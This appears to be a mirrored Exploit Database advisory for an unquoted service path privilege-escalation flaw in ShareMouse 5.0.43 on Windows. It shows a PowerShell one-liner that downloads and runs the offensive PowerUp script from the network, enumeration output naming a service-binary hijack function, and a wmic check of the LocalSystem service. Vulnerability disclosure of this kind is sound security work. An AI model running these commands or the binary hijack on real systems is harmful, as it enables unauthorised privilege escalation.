ShareMouse 5.0.43 – ‘ShareMouse Service’ Unquoted Service Path

• Exploit Database
• 118 阅读

• 作者： alacerda
  日期： 2020-09-08
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/48794/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26

  # Exploit Title: ShareMouse 5.0.43 - &apos;ShareMouse Service&apos; Unquoted Service Path # Discovery Date: 2020-09-08 # Discovery by: Alan Lacerda (alacerda) # Vendor Homepage: https://www.sharemouse.com/ # Software Link: https://www.sharemouse.com/ShareMouseSetup.exe # Version: 5.0.43 # Tested on OS: Microsoft Windows 10 Pro EN OS Version: 10.0.19041   PS > iex (iwr https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1 -UseBasicParsing); PS > Invoke-AllChecks   ServiceName : ShareMouse Service Path: C:\Program Files (x86)\ShareMouse\smService.exe StartName : LocalSystem AbuseFunction : Write-ServiceBinary -ServiceName &apos;ShareMouse Service&apos; -Path <HijackPath>   PS >wmic service where &apos;name like "%ShareMouse%"&apos; get DisplayName,PathName,AcceptStop,StartName AcceptStopDisplayName PathName StartName TRUEShareMouse ServiceC:\Program Files (x86)\ShareMouse\smService.exeLocalSystem   #Exploit: # A successful attempt would require the local user to be able to insert their code in the system root path # undetected by the OS or other security applications where it could potentially be executed during # application startup or reboot. If successful, the local user&apos;s code would execute with the elevated # privileges of the application.